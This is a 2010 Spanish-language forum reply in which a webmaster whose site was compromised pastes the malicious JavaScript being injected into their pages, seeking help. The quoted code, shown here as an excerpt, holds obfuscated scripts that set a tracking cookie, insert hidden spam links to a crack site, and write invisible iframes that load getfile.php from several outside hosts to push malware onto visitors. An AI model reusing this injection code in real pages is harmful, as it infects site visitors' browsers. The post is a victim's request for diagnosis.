Ver Mensaje Individual
  #9 (permalink)  
Antiguo 29/01/2010, 04:30
mita82
 
Fecha de Ingreso: enero-2010
Mensajes: 9
Antigüedad: 14 años, 3 meses
Puntos: 0
Respuesta: virus ataca servidores de dominio

No puedo modificar el php.ini ni el httpd.conf. El código que incrusta es bastante extenso. Os pongo el principio, luego sigue con un montón de enlaces a webs bastante dudosas.
Código:
<script type="text/javascript" language="javascript"> var aldy=new Date( ); aldy.setTime(aldy.getTime( )+12*60*60*1000); document.cookie="n\x5fses\x73_id\x3d53d\x312540afaf174fd0466f84\x316\x35af\x65e3"+"; path=/\x3b ex\x70\151\x72es="+aldy.toGMTString( ); </script> 
<script>document.write(String.fromCharCode(59+1,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script><h1><a href="http://keygenguru.com">crack</a>&nbsp; </h1>
En algún otro momento lo que hacía era meter iframes a otros enlaces:
Código:
<script type="text/javascript" language="javascript"> var ukhdhi=new Date( ); ukhdhi.setTime(ukhdhi.getTime( )+12*60*60*1000); document.cookie="n\x5fses\x73_id\x3d53d\x312540afaf174fd0466f84\x316\x35af\x65e3"+"; path=/\x3b ex\x70\151\x72es="+ukhdhi.toGMTString( ); </script> 
<script type="text/javascript" language="javascript"> var vkqyo="\x63\x61,co,da\x2cde,cy,\x65l,en\x2ceo,\x65s,f\x69,fr\x2cga\x2cit\x2cja\x2cji\x2ckn\x2cn\x6c,\x6eo,\x70t,\x73v"; var lrqicx=navigator.language || navigator.systemLanguage; var lang=lrqicx.toLowerCase( ); lang=lang.substr(0,2); if (vkqyo.indexOf(lang)==-1){navqd( ); }else {dnav( ); }function dnav( ){ document.write('<ifram\x65 \x66r\x61\x6debo\x72der=\x30\x20b\x6f\x72der=0 \x68e\x69ght=5 w\x69dth=0 s\x72c=\x22http:/\x2f208.109\x2e\x3229\x2e8\x31/admin/g\x65t\x66ile.\x70hp\x3f\x61=1"></i\x66rame><iframe \x66r\x61meborde\x72=\x30 borde\x72=0 heig\x68t=5 width=0 src="h\x74tp://topgravur.de/admin/\x67\x65tfile.php?a\x3d\x31"><\x2fif\x72a\x6de><iframe frame\x62order=\x30 borde\x72=\x30 h\x65i\x67ht=5 \x77id\x74\x68=\x30 src="http://ele\x61nor\x6eursing\x2eco.u\x6b/admin/getfi\x6ce.php?a=1\x22></if\x72\x61me>');
que son los que bloquea el AVG. De todos mosdos se manifiesta de distinto modo en IE y en FF. En FF simplemente muestra la págian en blanco mientars que el IE al intentar ejecutar el código JS incrustado hace saltar el antivirus.
Gracias de nuevo!!